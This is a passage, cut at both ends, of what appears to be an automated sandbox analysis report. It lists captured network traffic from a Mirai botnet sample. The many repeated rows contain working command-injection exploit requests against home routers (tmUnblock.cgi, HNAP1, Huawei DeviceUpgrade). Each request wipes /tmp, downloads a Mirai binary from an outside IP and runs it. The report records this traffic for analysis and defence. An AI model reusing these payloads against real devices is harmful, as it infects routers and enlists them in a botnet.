xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /HNAP1/ HTTP/1.0Content-Type: text/xml; charset="utf-8"SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://177.71.255.227/bins/mirai.mips && chmod +x mirai.mips;./mirai.mips HNAP`Content-Length: 640Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget http://177.71.255.227/bins/mirai.mips; /bin/busybox chmod 777 * mirai.mips; ./mirai.mips huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope> |
| Source: global traffic | HTTP traffic detected: POST /tmUnblock.cgi cd /tmp; rm -rf *; wget http://177.71.255.227/bins/mirai.mpsl;chmod 777 *;./mirai.mpsl asuData Raw: Data Ascii: |
| Source: global traffic | HTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 37 37 2e 37 31 2e 32 35 35 2e 32 32 37 2f 62 69 6e 73 2f 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 6d 69 72 61 69 2e 6d 69 70 73 3b 20 2e 2f 6d 69 72 61 69 2e 6d 69 70 73 20 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 